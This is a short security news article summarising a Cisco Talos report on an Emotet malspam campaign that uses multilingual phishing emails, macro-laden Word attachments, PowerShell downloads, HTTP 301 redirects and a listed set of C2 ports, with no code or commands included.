Emotet trojan observed using HTTP 301 redirects in a new malspam campaign

• The malware is distributed via phishing emails in different languages to evade detection.
• Once installed, it connects with the C2 server of the attackers using specific ports that include 20, 80, 443, 7080, 8443, and 50000.

Emotet trojan has made a comeback in a new malspam campaign. Attackers are using phishing emails to distribute the malware that is capable of stealing sensitive data of users.

Modus Operandi

According to a report from Cisco Talos, the new campaign involves attackers sending victims phishing emails that contain a Microsoft Word attachment. The Word doc contains malicious macros which act as a downloader for the malware.

When the malicious code is executed, the Powershell is invoked, which eventually connects to the Emotet malware distribution server and downloads the trojan into the host system.

In order to evade detection, these phishing emails are sent to targeted victims in different languages. In this way, the attackers fool the users into opening the email and clicking on the malicious attachment.

“Once a user opens the email message and opens the attachment or clicks the link, malware is downloaded to the system using either code embedded in the attachment or directly from the website in the case of URL-based emails,” said researchers at Cisco Talos in a blog post.

Another change that the researchers observed was the use of HTTP 301 redirects.

Commenting on the second method used in the campaign, the researchers added that, “The malware is overwhelmingly hosted on compromised websites.”

“This initial HTTP request is met with a 301 pointing back to the same URL. This second request results in the malware being delivered and the header no longer includes the keep-alive. The reason for the 301 redirection and second request are currently unknown since browsing directly to the URL results in the malware being returned,” Cisco researchers explained.

Targeted ports

Once installed, the Emotet connects with the C2 server of hackers using specific ports that include 20, 80, 443, 7080, 8443, and 50000.

The malware is under constant development. For gaining persistence, the malware checks if a victim’s IP address is blacklisted or on a spam list maintained by services like Spamhaus, SpamCop, or SORBS.